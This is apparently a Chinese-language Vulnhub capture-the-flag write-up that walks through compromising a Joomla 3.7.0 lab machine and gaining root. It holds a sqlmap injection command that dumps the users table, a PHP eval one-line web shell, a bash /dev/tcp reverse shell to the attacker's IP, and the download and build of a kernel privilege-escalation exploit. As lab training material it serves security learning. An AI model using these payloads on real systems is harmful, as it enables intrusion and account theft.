靶机分配不到 IP 问题:Vulnhub分配IP问题
这个靶机只有一个 flag 了,要 root 权限才能看
nmap 扫一波
ps.有个 whatweb 网站指纹扫描工具
还有个针对 Joomla 的扫描工具:joomscan --url http://192.168.149.157
搜一下:searchsploit Joomla 3.7.0
sqlmap 跑一下
最终的 sqlmap 命令
sqlmap -u "http://192.168.149.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C name,password --dump -p list[fullordering]
把 password 的 hash 保存下来,使用 john 爆破,得到密码:snoopy
使用 admin/snoopy 登录
在这个地方写一句话
<?php @eval($_POST['yichen']); ?>
@是PHP提供的错误信息屏蔽专用符号
蚁剑连接一下
本地监听一个端口:nc -lvp 8888
终端里面执行:
bash -c 'bash -i &>/dev/tcp/192.168.149.141/8888 0>&1'
lsb_release -a 可以看到是 ubuntu 16.04
searchsploit ubuntu 16.04,大佬们说这个可以用
cat 一下,让去下这个东西:
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
不知道为啥参考的文章评论区说这个 exp 没了,我是可以的呀
unzip 39772.zip #解压 29772.zip 文件
cd 39772
tar -xvf exploit.tar #解压 exploit 提权脚本 tar 包
cd ebpf_mapfd_doubleput_exploit
./compile.sh #执行脚本,编译文件
./doubleput #执行提权文件
在 /root 目录下存着 flag
这就叫脚本小子吗?爱了爱了